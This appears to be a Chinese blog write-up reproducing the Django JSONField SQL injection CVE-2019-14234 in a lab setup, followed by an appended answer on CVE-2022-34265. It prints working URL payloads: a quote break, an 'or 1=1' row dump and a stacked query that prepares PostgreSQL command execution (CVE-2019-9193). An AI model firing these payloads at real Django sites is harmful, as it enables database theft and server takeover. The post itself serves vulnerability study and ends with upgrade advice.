django SQL注入(CVE-2019-14234)

漏洞描述:

Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞,Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞。

后台登录页面:http://ip:port/admin

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问http://ip:port/admin,进入后台管理系统

3.构造payload,令b=123

payload:

http://ip:port/admin/vuln/collection/?detail__a%27b=123

4.查询所有结果

http://ip:port/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

5.结合CVE-2019-9193我们尝试进行命令注入

http://ip:port/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

显示没有要获取的结果,证明命令正常执行

借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;数据库被恶意操作;服务器被远程控制,被安装后门。

修复建议:

  1. 升级版本。

  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
回答: CVE-2022-34265是一个影响DjangoSQL注入漏洞。该漏洞存在于Trunc()方法的kind参数和Extract()方法的lookup_name参数未进行安全过滤的情况下,攻击者可以利用这个漏洞进行SQL注入攻击。\[2\]该漏洞的影响等级被评定为高危,但利用成本较低。受影响的版本是(∞, 3.2.14)和\[4.0, 4.0.6),官方已经在4.0.6和3.2.14版本中修复了这个问题。\[2\]如果你想复现这个漏洞,你可以选择一个名为CVE-2022-34265的漏洞文件夹,然后运行docker-compose up -d命令来加载漏洞环境。\[1\]你可以通过docker-compose ps命令查看环境所在的端口号,通常是8000。\[1\]然后你可以在浏览器中输入http://your-ip:8000来访问漏洞环境。\[3\]在页面上,你会看到time和count两个参数。你可以通过修改date参数的值来触发漏洞。\[3\]需要注意的是,官方已经发布了修复此漏洞的安全更新,建议开发者及时更新Django版本以避免受到攻击。\[2\] #### 引用[.reference_title] - *1* *3* [通过Trunc(kind)和Extract(lookup_name)参数的Django潜在SQL注入CVE-2022-34265)](https://blog.csdn.net/weixin_58320878/article/details/127138812)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Python Web 框架 Django 修复SQL注入漏洞(CVE-2022-34265)](https://blog.csdn.net/murphysec/article/details/125697351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值